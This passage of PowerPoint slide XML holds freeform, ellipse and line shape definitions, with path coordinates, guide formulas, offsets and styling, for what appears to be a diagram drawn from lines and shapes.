                  <a:pt x="351" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10320" name="Freeform 401"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4110037" y="7151688"/>
            <a:ext cx="912813" cy="206375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T1" fmla="*/ 0 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 0 w 404"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 0 w 404"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T103" fmla="*/ 0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4"/>
              <a:gd name="T157" fmla="*/ 0 h 91"/>
              <a:gd name="T158" fmla="*/ 404 w 404"/>
              <a:gd name="T159" fmla="*/ 91 h 9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4" h="91">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10321" name="Line 402"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4640262" y="7316788"/>
            <a:ext cx="142875" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10322" name="Line 403"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4479925" y="7199313"/>
            <a:ext cx="168275" cy="117475"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10323" name="Line 404"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4332287" y="7312025"/>
            <a:ext cx="160338" cy="4763"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10324" name="Line 405"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4479925" y="7197725"/>
            <a:ext cx="168275" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10325" name="Line 406"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2249487" y="6397625"/>
            <a:ext cx="3175" cy="1235075"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10326" name="Line 407"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1922462" y="6397625"/>
            <a:ext cx="327025" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10327" name="Line 408"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1922462" y="7123113"/>
            <a:ext cx="327025" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10328" name="Line 409"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1922462" y="7626350"/>
            <a:ext cx="327025" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10329" name="Line 410"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2249487" y="7045325"/>
            <a:ext cx="261938" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10330" name="Line 411"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3254375" y="7072313"/>
            <a:ext cx="260350" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10331" name="Line 412"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3519487" y="6526213"/>
            <a:ext cx="1588" cy="1106487"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10332" name="Line 413"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3189287" y="6526213"/>
            <a:ext cx="325438" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10333" name="Line 414"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3189287" y="7632700"/>
            <a:ext cx="325438" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10334" name="Freeform 415"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354137" y="6867525"/>
            <a:ext cx="561975" cy="469900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 208"/>
